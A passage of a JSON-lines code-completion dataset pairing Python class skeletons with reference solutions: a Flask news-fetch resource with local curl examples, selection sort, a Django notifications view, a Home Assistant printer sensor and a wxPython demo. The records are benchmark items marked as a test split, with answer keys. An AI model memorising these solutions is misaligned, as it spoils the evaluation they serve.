本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201", "name": "post", "signature": "def post(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006001", "prompt": "Implement the Python class `FetchResultListResource` described below.\n\nClass description:\nFetchResultListResource\n\nMethod signatures and docstrings:\n- def get(self): Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\n- def post(self): Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201", "prompted_full_text": "Implement the Python class `FetchResultListResource` described below.\n\nClass description:\nFetchResultListResource\n\nMethod signatures and docstrings:\n- def get(self): Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\n- def post(self): Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\n\n<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "revision_id": "6ef54f3f7efbbaff6169e963dcf45ab25e11e593", "skeleton": "<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"
本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n", "source": "the_stack_v2_python_sparse", "source_path": "web_api/news/resources/fetch_result.py", "source_repo": "zhanghe06/flask_restful", "split": "test", "star_events_count": 2} {"blob_id": "d00aba6c37f9bb09f46592d521c1758c3ed33fa7", "bodies": ["if arr is None:\n return arr\nn = len(arr)\nif n <= 1:\n return arr\nfor i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\nreturn arr", "if arr is None:\n return arr\nn = len(arr)\nif n <= 1:\n return arr\nfor i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\nreturn arr"], "bodies_text": "<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SelectionSort", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). 
:param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000138", "length_bytes": 2594, "license_type": "permissive", "methods": [{"docstring": "Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "name": "selection_sort_min_version", "signature": "def selection_sort_min_version(arr)"}, {"docstring": "Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "name": "selection_sort_max_version", "signature": "def selection_sort_max_version(arr)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003866", "prompt": "Implement the Python class `SelectionSort` described below.\n\nClass description:\nImplement the SelectionSort class.\n\nMethod signatures and docstrings:\n- def selection_sort_min_version(arr): Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n- def selection_sort_max_version(arr): Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "prompted_full_text": "Implement the Python class `SelectionSort` described below.\n\nClass description:\nImplement the SelectionSort class.\n\nMethod signatures and docstrings:\n- def selection_sort_min_version(arr): Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n- def selection_sort_max_version(arr): Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n\n<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. 
It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "revision_id": "8504db89a3f6a1596c0bb7343a4936884b44e6ea", "skeleton": "<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelectionSort:\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). 
:param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n", "source": "the_stack_v2_python_sparse", "source_path": "sorting/selection_sort.py", "source_repo": "fimh/dsa-py", "split": "test", "star_events_count": 2} {"blob_id": "bfddf40cb678c98d2b73767b34afb4259402e163", "bodies": ["user = request.user\nnotifications = Notification.objects.all()\ndata = {}\nfor notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\nreturn Response(data, status=status.HTTP_200_OK)", "notifications = Notification.objects.all()\nuser = request.user\nfor notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\nreturn Response(response, status=status.HTTP_200_OK)"], "bodies_text": "<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "class_docstring": "get:", "class_name": "NotificationAPIView", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000139", "length_bytes": 7717, "license_type": "permissive", "methods": [{"docstring": "Retrieve all notifications from the database for a specific user. 
:returns notifications: a json data for the notifications", "name": "get", "signature": "def get(self, request)"}, {"docstring": "Mark all notifications as read.", "name": "put", "signature": "def put(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001101", "prompt": "Implement the Python class `NotificationAPIView` described below.\n\nClass description:\nget:\n\nMethod signatures and docstrings:\n- def get(self, request): Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\n- def put(self, request): Mark all notifications as read.", "prompted_full_text": "Implement the Python class `NotificationAPIView` described below.\n\nClass description:\nget:\n\nMethod signatures and docstrings:\n- def get(self, request): Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\n- def put(self, request): Mark all notifications as read.\n\n<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "revision_id": "daf55ce4819f57cec8510c5726e86a0b1e78e3e1", "skeleton": "<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. 
:returns notifications: a json data for the notifications\"\"\"\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n", "source": "the_stack_v2_python_sparse", "source_path": "authors/apps/notifications/views.py", "source_repo": "andela/ah-magnificent6", "split": "test", "star_events_count": 0} {"blob_id": "360344bffecce399a668c5a77d9d76a15d9dd637", "bodies": ["super().__init__(syncthru, name)\nself._id_suffix = '_main'\nself._active = True", "if not self._active:\n return\ntry:\n await self.syncthru.update()\nexcept ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\nself._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\nself._attributes = {'display_text': self.syncthru.device_status_details()}"], "bodies_text": "<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "class_docstring": "Implementation of the main sensor, conducting the actual polling.", "class_name": "SyncThruMainSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. 
Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000140", "length_bytes": 8262, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def __init__(self, syncthru, name)"}, {"docstring": "Get the latest data from SyncThru and update the state.", "name": "async_update", "signature": "async def async_update(self)"}], "n_methods": 2, "prompt": "Implement the Python class `SyncThruMainSensor` described below.\n\nClass description:\nImplementation of the main sensor, conducting the actual polling.\n\nMethod signatures and docstrings:\n- def __init__(self, syncthru, name): Initialize the sensor.\n- async def async_update(self): Get the latest data from SyncThru and update the state.", "prompted_full_text": "Implement the Python class `SyncThruMainSensor` described below.\n\nClass description:\nImplementation of the main sensor, conducting the actual polling.\n\nMethod signatures and docstrings:\n- def __init__(self, syncthru, name): Initialize the sensor.\n- async def async_update(self): Get the latest data from SyncThru and update the state.\n\n<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "revision_id": "ed4ab403deaed9e8c95e0db728477fcb012bf4fa", "skeleton": "<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. 
Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/syncthru/sensor.py", "source_repo": "tchellomello/home-assistant", "split": "test", "star_events_count": 8} {"blob_id": "5b02ee3954eca5435824b3b552575275d60cac50", "bodies": ["wx.Frame.__init__(self, parent, id, 'wxYield Test')\nwx.Button(self, ID_START, 'Start', pos=(0, 0))\nwx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\nself.status = wx.StaticText(self, -1, '', pos=(0, 100))\nself.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\nself.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\nself.working = 0", "if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0", "if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1"], "bodies_text": "<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "class_docstring": "Class MainFrame.", "class_name": "MainFrame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n 